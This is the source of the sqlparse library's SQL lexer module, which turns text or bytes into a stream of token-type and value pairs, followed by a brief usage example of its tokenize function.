Current File : /lib/python3/dist-packages/sqlparse/__pycache__/lexer.cpython-310.pyc
"""SQL Lexer"""

from io import TextIOBase

from sqlparse import tokens
from sqlparse.keywords import SQL_REGEX
from sqlparse.utils import consume


class Lexer:
    """Lexer
    Empty class. Leaving for backwards-compatibility
    """

    @staticmethod
    def get_tokens(text, encoding=None):
        """
        Return an iterable of (tokentype, value) pairs generated from
        `text`. If `unfiltered` is set to `True`, the filtering mechanism
        is bypassed even if filters are defined.

        Also preprocess the text, i.e. expand tabs and strip it if
        wanted and applies registered filters.

        Split ``text`` into (tokentype, text) pairs.

        ``stack`` is the initial stack (default: ``['root']``)
        """
        if isinstance(text, TextIOBase):
            text = text.read()

        if isinstance(text, str):
            pass
        elif isinstance(text, bytes):
            if encoding:
                text = text.decode(encoding)
            else:
                try:
                    text = text.decode('utf-8')
                except UnicodeDecodeError:
                    text = text.decode('unicode-escape')
        else:
            raise TypeError("Expected text or file-like object, got {!r}".
                            format(type(text)))

        iterable = enumerate(text)
        for pos, char in iterable:
            for rexmatch, action in SQL_REGEX:
                m = rexmatch(text, pos)

                if not m:
                    continue
                elif isinstance(action, tokens._TokenType):
                    yield action, m.group()
                elif callable(action):
                    yield action(m.group())

                consume(iterable, m.end() - pos - 1)
                break
            else:
                yield tokens.Error, char


def tokenize(sql, encoding=None):
    """Tokenize sql.

    Tokenize *sql* using the :class:`Lexer` and return a 2-tuple stream
    of ``(token type, value)`` items.
    """
    return Lexer().get_tokens(sql, encoding)
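A minimal usage sketch, not part of the module above: tokenize() wraps Lexer.get_tokens() and lazily yields (token type, value) pairs; the sample SQL statement below is purely illustrative.

# Hypothetical demo script, assuming sqlparse is installed.
from sqlparse.lexer import tokenize

for ttype, value in tokenize("SELECT id, name FROM users WHERE id = 1;"):
    print(ttype, repr(value))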
